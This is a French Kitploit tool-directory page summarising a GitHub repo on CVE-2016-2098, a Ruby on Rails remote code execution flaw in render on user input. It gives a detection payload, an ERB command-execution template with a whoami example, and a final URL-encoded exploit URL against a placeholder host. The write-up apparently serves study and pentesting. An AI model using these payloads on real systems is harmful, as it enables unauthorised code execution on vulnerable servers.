Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2016-2098 — Vulnérabilité d'exécution de code à distance dans Ruby-on-Rails lors de l'utilisation de render sur des données fournies par l'utilisateur. | Kitploit
Outils/GitHubGitHub/j4k0m/cve-2016-2098
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubj4k0m/cve-2016-2098

CVE-2016-2098

Vulnérabilité d'exécution de code à distance dans Ruby-on-Rails lors de l'utilisation de render sur des données fournies par l'utilisateur.

Voir le dépôt
4il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2016-2098

Vulnérabilité d'exécution de code à distance dans Ruby-on-Rails lors de l'utilisation de render sur des données fournies par l'utilisateur.

Explication :

Ce problème provient de l'utilisation de la méthode render sur des données fournies par l'utilisateur.

La méthode render est généralement utilisée pour afficher une page à partir d'un modèle, mais la méthode render permet également aux développeurs d'afficher du texte brut (plaintext) et même du code en ligne (inline).

Fonction render :

root@kitploit:~
# File actionpack/lib/abstract_controller/rendering.rb, line 23
def render(*args, &block)
  options = _normalize_render(*args, &block)
  rendered_body = render_to_body(options)
  if options[:html]
    _set_html_content_type
  else
    _set_rendered_content_type rendered_format
  end
  _set_vary_header
  self.response_body = rendered_body
end

Exemple d'exploitation :

URL cible :

root@kitploit:~
http://example.com/?view=test

Exploitation :

root@kitploit:~
http://example.com/?view[inline]=OK

Si 'OK' s'affiche dans le code source, alors l'application web est vulnérable à CVE-2016-2098.

Exécution de code à distance

root@kitploit:~
<%= %x('[CMD]') %>

Nous pouvons remplacer CMD par la commande que nous voulons exécuter.

root@kitploit:~
<%= %x('whoami') %>

Après encodage URL :

root@kitploit:~
%3C%25=%20%25x(whoami)%20%25%3E

Final :

root@kitploit:~
http://example.com/?view[inline]=%3C%25=%20%25x(whoami)%20%25%3E

Ressources :

  • https://guides.rubyonrails.org/layouts_and_rendering.html
Télécharger l’outil